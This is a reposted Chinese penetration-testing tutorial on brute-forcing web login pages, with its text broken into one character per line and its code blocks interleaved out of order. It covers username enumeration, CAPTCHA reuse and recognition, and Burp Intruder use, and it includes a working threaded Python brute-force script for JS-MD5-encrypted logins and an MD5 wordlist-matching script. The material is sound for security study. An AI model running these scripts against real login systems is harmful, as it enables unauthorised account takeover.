论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[865] 2018-06-13_渗透技巧--浅析web暴力猜解
文档创建者:
s7ckTeam
浏览次数:
6
最后更新:
2025-01-16
渗透测试
6 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前在线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2018-06-13_渗透技巧--浅析web暴力猜解
渗
透
技
巧
-
-
浅
析
w
e
b
暴
力
猜
解
原
创
B
y
p
a
s
s
B
y
p
a
s
s
2
0
1
8
-
0
6
-
1
3
0
x
0
1
前
言
前
言
W
e
b
登
录
界
面
是
网
站
前
台
进
入
后
台
的
通
道
,
针
对
登
录
管
理
界
面
,
常
见
的
w
e
b
攻
击
如
:
S
Q
L
注
入
、
X
S
S
、
弱
口
令
、
暴
力
猜
解
等
。
本
文
主
要
对
w
e
b
暴
力
猜
解
的
思
路
做
一
个
简
单
的
分
析
,
并
结
合
漏
洞
实
例
进
行
阐
述
。
0
x
0
2
思
路
思
路
在
W
e
b
登
录
界
面
主
要
有
三
个
要
素
:
用
户
名
、
密
码
、
验
证
码
,
最
简
单
的
思
路
:
1
、
获
取
用
户
名
,
常
见
的
有
登
录
错
误
提
示
、
网
站
文
章
编
辑
落
款
、
社
工
等
2
、
猜
解
密
码
,
一
个
有
效
的
字
典
3
、
验
证
码
识
别
或
绕
过
,
常
见
有
验
证
码
与
用
户
名
密
码
分
离
、
验
证
码
不
能
自
动
刷
新
可
重
复
使
用
、
验
证
码
识
别
按
照
H
T
T
P
传
递
数
据
的
方
式
,
大
致
分
为
两
个
类
型
:
类
型
一
:
明
文
传
输
没
有
验
证
码
、
没
有
做
登
录
失
败
处
理
的
w
e
b
应
用
,
这
个
是
最
喜
闻
乐
见
的
,
只
有
用
户
名
、
密
码
登
录
,
可
以
直
接
加
载
字
典
进
行
爆
破
,
最
常
见
的
就
是
使
用
利
用
B
u
r
p
S
u
i
t
e
I
n
t
r
u
d
e
r
进
行
暴
力
猜
解
,
I
n
t
r
u
d
e
r
支
持
多
种
爆
破
模
式
:
单
一
字
典
爆
破
、
多
字
段
相
同
字
典
爆
破
、
多
字
典
位
置
对
应
爆
破
、
聚
合
式
爆
破
。
类
型
二
:
前
端
j
s
加
密
处
理
现
在
,
不
少
W
e
b
应
用
在
登
录
过
程
中
会
使
用
j
s
对
密
码
进
行
加
密
,
然
后
在
发
送
服
务
端
,
使
用
代
理
工
具
抓
包
获
取
到
的
密
码
就
是
加
密
后
的
密
码
,
在
一
定
程
度
上
给
我
们
爆
破
增
加
了
些
麻
烦
。
以
下
针
对
j
s
加
密
爆
破
的
思
路
做
一
个
分
析
。
0
x
0
3
j
s
加
密
爆
破
加
密
爆
破
常
见
的
j
s
实
现
加
密
的
方
式
有
:
m
d
5
、
b
a
s
e
6
4
、
s
h
a
l
,
这
里
编
写
了
一
个
简
单
的
d
e
m
o
作
为
测
试
。
l
o
g
i
n
.
h
t
m
l
提
交
表
单
,
进
行
抓
包
,
可
以
发
现
密
码
字
段
密
码
进
行
了
加
密
处
理
:
常
见
的
j
s
m
d
5
加
密
,
处
理
方
式
有
两
种
,
其
一
是
利
用
I
n
t
r
u
d
e
r
支
持
多
种
加
密
和
编
码
,
对
密
码
字
段
进
行
加
密
,
其
二
是
编
写
P
y
t
h
o
n
脚
本
,
熟
悉
加
密
算
法
的
可
以
自
己
重
写
或
者
直
接
利
用
网
站
的
j
s
文
件
对
密
码
字
段
进
行
加
密
。
<
!
D
O
C
T
Y
P
E
H
T
M
L
>
<
h
t
m
l
>
<
h
e
a
d
>
<
m
e
t
a
c
h
a
r
s
e
t
=
"
u
t
f
-
8
"
>
<
t
i
t
l
e
>
用
户
登
录
<
/
t
i
t
l
e
>
<
s
c
r
i
p
t
t
y
p
e
=
"
t
e
x
t
/
e
c
m
a
s
c
r
i
p
t
"
s
r
c
=
"
m
d
5
.
j
s
"
>
<
/
s
c
r
i
p
t
>
<
s
c
r
i
p
t
>
f
u
n
c
t
i
o
n
c
h
e
c
k
I
n
p
u
t
(
)
{
v
a
r
p
a
s
s
w
o
r
d
_
i
n
p
u
t
=
d
o
c
u
m
e
n
t
.
g
e
t
E
l
e
m
e
n
t
B
y
I
d
(
'
p
a
s
s
w
o
r
d
'
)
;
v
a
r
p
a
s
s
w
o
r
d
_
m
d
5
=
d
o
c
u
m
e
n
t
.
g
e
t
E
l
e
m
e
n
t
B
y
I
d
(
'
p
a
s
s
w
o
r
d
_
m
d
5
'
)
;
/
/
s
e
t
p
a
s
s
w
o
r
d
p
a
s
s
w
o
r
d
_
m
d
5
.
v
a
l
u
e
=
h
e
x
_
m
d
5
(
p
a
s
s
w
o
r
d
_
i
n
p
u
t
.
v
a
l
u
e
)
;
r
e
t
u
r
n
t
r
u
e
;
}
<
/
s
c
r
i
p
t
>
<
/
h
e
a
d
>
<
b
o
d
y
>
<
f
o
r
m
a
c
t
i
o
n
=
"
l
o
g
i
n
.
p
h
p
"
m
e
t
h
o
d
=
"
p
o
s
t
"
o
n
s
u
b
m
i
t
=
"
r
e
t
u
r
n
c
h
e
c
k
I
n
p
u
t
(
)
"
>
用
户
:
<
i
n
p
u
t
t
y
p
e
=
"
t
e
x
t
"
i
d
=
"
u
s
e
r
n
a
m
e
"
n
a
m
e
=
"
u
s
e
r
n
a
m
e
"
>
<
b
r
/
>
密
码
:
<
i
n
p
u
t
t
y
p
e
=
"
p
a
s
s
w
o
r
d
"
i
d
=
"
p
a
s
s
w
o
r
d
"
>
<
b
r
/
>
<
i
n
p
u
t
t
y
p
e
=
"
h
i
d
d
e
n
"
i
d
=
"
p
a
s
s
w
o
r
d
_
m
d
5
"
n
a
m
e
=
"
p
a
s
s
w
o
r
d
"
>
<
i
n
p
u
t
t
y
p
e
=
"
s
u
b
m
i
t
"
v
a
l
u
e
=
"
提
交
"
/
>
<
/
f
o
r
m
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
3
.
1
B
u
r
p
S
u
i
t
e
I
n
t
r
u
d
e
r
1
、
抓
包
发
送
到
I
n
t
r
u
d
e
r
,
标
记
相
关
参
数
,
选
择
第
四
种
模
式
“
C
l
u
s
t
e
r
b
o
m
b
”
2
、
分
别
选
择
用
户
名
字
典
和
密
码
字
典
,
在
设
置
密
码
字
典
的
时
候
,
选
择
m
d
5
加
密
方
式
对
密
码
字
段
进
行
加
密
处
理
3
、
开
始
进
行
爆
破
,
根
据
返
回
字
段
长
度
判
断
是
否
成
功
,
成
功
获
取
用
户
名
和
密
码
字
段
的
M
D
5
值
a
d
m
i
n
:
2
1
2
3
2
f
2
9
7
a
5
7
a
5
a
7
4
3
8
9
4
a
0
e
4
a
8
0
1
f
c
3
4
、
m
d
5
解
密
成
功
,
获
得
用
户
名
密
码
a
d
m
i
n
/
a
d
m
i
n
3
.
2
P
y
E
x
e
c
J
S
这
边
采
用
P
y
t
h
o
n
E
x
e
c
J
s
来
执
行
J
s
语
句
模
拟
前
端
对
账
号
密
码
进
行
加
密
准
备
:
p
i
p
i
n
s
t
a
l
l
P
y
E
x
e
c
J
S
p
h
a
n
t
o
m
j
s
下
载
:
h
t
t
p
s
:
/
/
b
i
t
b
u
c
k
e
t
.
o
r
g
/
a
r
i
y
a
/
p
h
a
n
t
o
m
j
s
/
d
o
w
n
l
o
a
d
s
/
p
h
a
n
t
o
m
j
s
-
2
.
1
.
1
-
w
i
n
d
o
w
s
.
z
i
p
编
写
P
y
t
h
o
n
脚
本
进
行
爆
破
:
#
!
/
u
s
r
/
b
i
n
/
e
n
v
p
y
t
h
o
n
#
_
*
_
c
o
d
i
n
g
:
u
t
f
-
8
_
*
_
i
m
p
o
r
t
r
e
q
u
e
s
t
s
i
m
p
o
r
t
t
h
r
e
a
d
p
o
o
l
f
r
o
m
s
e
l
e
n
i
u
m
i
m
p
o
r
t
w
e
b
d
r
i
v
e
r
i
m
p
o
r
t
e
x
e
c
j
s
d
e
f
g
e
t
p
a
s
s
(
s
t
r
)
:
w
i
t
h
o
p
e
n
(
'
m
d
5
.
j
s
'
,
'
r
'
)
a
s
j
s
:
s
o
u
r
c
e
=
j
s
.
r
e
a
d
(
)
p
h
a
n
t
o
m
=
e
x
e
c
j
s
.
g
e
t
(
'
P
h
a
n
t
o
m
J
S
'
)
g
e
t
p
a
s
s
=
p
h
a
n
t
o
m
.
c
o
m
p
i
l
e
(
s
o
u
r
c
e
)
p
a
s
s
w
o
r
d
=
g
e
t
p
a
s
s
.
c
a
l
l
(
'
h
e
x
_
m
d
5
'
,
s
t
r
)
成
功
爆
破
用
户
账
号
密
码
0
x
0
4
漏
洞
实
例
漏
洞
实
例
r
e
t
u
r
n
p
a
s
s
w
o
r
d
d
e
f
l
o
g
i
n
(
u
s
e
r
,
p
a
s
s
w
d
)
:
u
r
l
=
"
h
t
t
p
:
/
/
1
2
7
.
0
.
0
.
1
/
l
o
g
i
n
.
p
h
p
"
p
a
y
l
o
a
d
=
{
'
u
s
e
r
n
a
m
e
'
:
u
s
e
r
,
'
p
a
s
s
w
o
r
d
'
:
g
e
t
p
a
s
s
(
p
a
s
s
w
d
)
}
h
e
a
d
e
r
s
=
{
'
U
s
e
r
-
A
g
e
n
t
'
:
'
M
o
z
i
l
l
a
/
5
.
0
(
W
i
n
d
o
w
s
N
T
1
0
.
0
;
W
O
W
6
4
;
r
v
:
5
5
.
0
)
G
e
c
k
o
/
2
0
1
0
0
1
0
1
F
i
r
e
f
o
x
/
5
5
.
0
'
}
t
r
y
:
r
e
s
p
o
n
s
e
=
r
e
q
u
e
s
t
s
.
p
o
s
t
(
u
r
l
,
d
a
t
a
=
p
a
y
l
o
a
d
,
h
e
a
d
e
r
s
=
h
e
a
d
e
r
s
,
t
i
m
e
o
u
t
=
5
)
r
e
s
u
l
t
=
r
e
s
p
o
n
s
e
.
c
o
n
t
e
n
t
i
f
r
e
s
u
l
t
.
c
o
u
n
t
(
'
f
a
i
l
'
)
<
1
:
p
r
i
n
t
'
[
s
u
c
c
e
s
s
]
'
+
u
r
l
+
"
:
"
+
u
s
e
r
+
'
:
'
+
p
a
s
s
w
d
e
x
c
e
p
t
:
p
a
s
s
d
e
f
g
e
t
L
i
n
e
s
(
f
i
l
e
N
a
m
e
)
:
l
i
s
t
=
[
]
w
i
t
h
o
p
e
n
(
f
i
l
e
N
a
m
e
,
'
r
'
)
a
s
f
d
:
f
o
r
l
i
n
e
i
n
f
d
.
r
e
a
d
l
i
n
e
s
(
)
:
l
i
n
e
=
l
i
n
e
.
s
t
r
i
p
(
)
i
f
n
o
t
l
e
n
(
l
i
n
e
)
o
r
l
i
n
e
.
s
t
a
r
t
s
w
i
t
h
(
'
#
'
)
:
c
o
n
t
i
n
u
e
l
i
s
t
.
a
p
p
e
n
d
(
l
i
n
e
)
r
e
t
u
r
n
l
i
s
t
i
f
_
_
n
a
m
e
_
_
=
=
'
_
_
m
a
i
n
_
_
'
:
u
s
e
r
n
a
m
e
_
l
i
s
t
=
g
e
t
L
i
n
e
s
(
'
u
s
e
r
.
d
i
c
t
'
)
p
a
s
s
w
o
r
d
_
l
i
s
t
=
g
e
t
L
i
n
e
s
(
'
p
a
s
s
.
d
i
c
t
'
)
u
s
e
r
l
i
s
t
=
[
(
[
u
s
e
r
,
p
a
s
s
w
d
]
,
N
o
n
e
)
f
o
r
u
s
e
r
i
n
u
s
e
r
n
a
m
e
_
l
i
s
t
f
o
r
p
a
s
s
w
d
i
n
p
a
s
s
w
o
r
d
_
l
i
s
t
]
p
o
o
l
=
t
h
r
e
a
d
p
o
o
l
.
T
h
r
e
a
d
P
o
o
l
(
2
0
)
r
e
q
s
=
t
h
r
e
a
d
p
o
o
l
.
m
a
k
e
R
e
q
u
e
s
t
s
(
l
o
g
i
n
,
u
s
e
r
l
i
s
t
)
[
p
o
o
l
.
p
u
t
R
e
q
u
e
s
t
(
r
e
q
)
f
o
r
r
e
q
i
n
r
e
q
s
]
p
o
o
l
.
w
a
i
t
(
)
这
里
分
享
两
个
漏
洞
实
例
,
在
实
战
中
,
根
据
不
同
的
漏
洞
场
景
,
灵
活
地
去
运
用
暴
力
美
学
,
简
单
,
极
具
杀
伤
力
。
漏
洞
实
例
一
:
未
授
权
获
取
用
户
名
漏
洞
实
例
一
:
未
授
权
获
取
用
户
名
+
密
码
密
码
j
s
加
密
加
密
+
验
证
码
重
复
利
用
验
证
码
重
复
利
用
漏
洞
场
景
:
网
站
首
页
包
含
一
个
登
陆
模
块
,
包
含
用
户
名
、
密
码
、
验
证
码
,
输
入
正
常
数
据
测
试
,
发
现
密
码
采
用
j
s
加
密
传
输
,
验
证
码
无
法
自
动
刷
新
,
可
重
复
使
用
。
1
、
扫
描
网
站
敏
感
文
件
,
发
现
系
统
存
在
未
授
权
访
问
,
通
过
u
r
l
可
直
接
访
问
系
统
后
台
日
志
管
理
模
块
,
获
取
用
户
登
录
用
户
名
等
。
2
、
通
过
未
授
权
获
取
到
的
用
户
名
,
加
载
密
码
字
典
,
并
对
字
典
密
码
进
行
编
码
,
暴
力
破
解
,
成
功
爆
破
出
用
户
t
b
的
密
码
所
对
应
的
m
d
5
值
为
:
6
8
4
6
8
6
0
6
8
4
f
0
5
0
2
9
a
b
c
c
c
0
9
a
5
3
c
d
6
6
f
1
3
、
m
d
5
破
解
,
获
得
m
d
5
所
对
应
的
值
为
:
a
1
1
1
1
1
1
T
I
P
S
:
有
时
候
遇
到
m
d
5
值
解
密
不
出
来
的
时
候
,
怎
么
办
?
我
们
知
道
,
这
个
m
d
5
值
所
对
应
的
的
是
我
们
密
码
字
典
里
的
某
一
个
,
可
以
编
写
P
y
t
h
o
n
脚
本
进
行
m
d
5
值
的
比
对
。
测
试
截
图
:
P
y
t
h
o
n
脚
本
:
!
/
u
s
r
/
b
i
n
/
e
n
v
p
y
t
h
o
n
-
-
c
o
d
i
n
g
:
u
t
f
-
8
-
-
i
m
p
o
r
t
h
a
s
h
l
i
b
s
r
c
=
'
6
8
4
6
8
6
0
6
8
4
f
0
5
0
2
9
a
b
c
c
c
0
9
a
5
3
c
d
6
6
f
1
'
d
e
f
g
e
t
_
l
i
n
e
(
)
:
f
=
o
p
e
n
(
'
1
.
t
x
t
'
)
#
默
认
m
o
d
e
=
‘
r
’
p
r
i
n
t
'
s
t
a
r
t
:
'
w
h
i
l
e
T
r
u
e
:
l
i
n
e
=
f
.
r
e
a
d
l
i
n
e
(
)
.
s
t
r
i
p
(
)
i
f
l
e
n
(
l
i
n
e
)
=
=
0
:
p
r
i
n
t
'
l
i
n
e
0
'
b
r
e
a
k
m
1
=
h
a
s
h
l
i
b
.
m
d
5
(
)
m
1
.
u
p
d
a
t
e
(
l
i
n
e
)
t
m
p
=
m
1
.
h
e
x
d
i
g
e
s
t
(
)
p
r
i
n
t
l
i
n
e
+
"
:
"
+
t
m
p
i
f
t
m
p
=
=
s
r
c
:
p
r
i
n
t
s
r
c
+
u
'
:
m
d
5
对
应
的
值
为
:
'
+
l
i
n
e
b
r
e
a
k
5
、
通
过
获
取
到
的
用
户
及
破
解
出
来
的
用
户
,
成
功
登
陆
系
统
。
漏
洞
场
景
二
:
登
录
错
误
提
示
漏
洞
场
景
二
:
登
录
错
误
提
示
+
验
证
码
可
识
别
验
证
码
可
识
别
1
、
输
入
用
户
名
a
d
m
i
n
,
密
码
、
验
证
码
,
提
示
您
输
入
的
用
户
名
不
存
在
,
请
重
新
输
入
。
2
、
利
用
P
k
a
v
H
T
T
P
F
u
z
z
e
r
1
.
2
的
验
证
码
识
别
引
擎
,
可
自
动
识
别
出
验
证
码
3
、
根
据
登
录
错
误
提
示
,
通
过
加
载
用
户
名
字
典
进
行
爆
破
,
当
提
示
“
您
输
入
的
密
码
不
正
确
,
请
重
新
输
入
”
,
这
个
时
候
我
们
获
得
了
用
户
名
为
s
y
s
a
d
m
i
n
,
进
一
步
加
载
密
码
字
典
进
行
爆
破
,
对
用
户
密
码
进
行
爆
破
。
喜
欢
这
篇
文
章
的
人
也
喜
欢
·
·
·
·
·
·
▶
【
代
码
审
计
】
E
a
s
y
S
N
S
_
V
1
.
6
远
程
图
片
本
地
化
导
致
G
e
t
s
h
e
l
l
▶
【
代
码
审
计
】
S
Q
L
二
次
编
码
注
入
漏
洞
实
例
(
附
t
a
m
p
e
r
脚
本
)
B
y
p
a
s
s
A
b
o
u
t
M
e
一
个
网
络
安
全
爱
好
者
,
对
技
术
有
着
偏
执
狂
一
样
的
追
求
。
致
力
于
分
享
原
创
高
质
量
干
货
,
包
括
但
不
限
于
:
渗
透
测
试
、
W
A
F
绕
过
、
代
码
审
计
、
安
全
运
维
。
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试